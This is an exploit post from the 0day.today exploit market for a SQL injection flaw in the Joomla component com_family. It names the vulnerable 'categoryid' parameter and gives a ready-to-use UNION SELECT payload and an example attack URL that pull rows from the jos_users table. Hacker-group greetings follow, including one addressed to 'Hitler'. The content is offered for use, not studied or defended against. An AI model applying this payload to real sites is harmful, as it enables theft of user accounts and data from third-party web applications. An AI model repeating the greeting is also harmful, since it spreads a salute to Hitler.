[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_family SQL Injection Vulnerability

Author
Net.Edit0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12791
Category
web applications
Date add
19-06-2010
Platform
php
=======================================================
Joomla Component com_family SQL Injection Vulnerability
=======================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#######################[In The Name Of God ]##########################
#Exploit Title        :  Joomla Component com_family SQL Injection Vulnerability
#Author               :  Net.Edit0r
#Contact              :  Net.Edit0r@Att.Net  
#Location             :  Iran
########################################################################
#file :
# prodler.class.php
# http://Target.com/index.php?option=com_family&view=family&task=getproductsbyfamily&familyid=2&categoryid=[SQL]
########################################################################
#3xplo!t :
#UNION SELECT 1,2,3,4 FROM jos_users
########################################################################
#3xample  :
#http://Target.com/index.php?option=com_family&view=family&task=getproductsbyfamily&familyid=2&categoryid=-1 UNION SELECT 1,2,3,4 FROM jos_users
########################################################################
#Greetz          : Netqurd [M1] ~ Hitler
#Special Thanks  : D3v1.BlackHat, M4hd1, Riden , B3hz4d
#Thanks 2        : ~[ CriMe ]~ , _R3v4l_ , † CoNstaNtine † , __l2o5v4__ ,
#                : ~~XTerror~~ , _RAMESH_, 
#Note : IRANIAN  HackerZ
########################################################################
#AttackerZ.IR ( Crazy Boys )
#Sun-army.Org (Iranian HacKerZ)
#Dark-tunnel.com (UnderGround Team)
###########################[Net.Edit0r]#################################



#  0day.today [2024-12-24]  #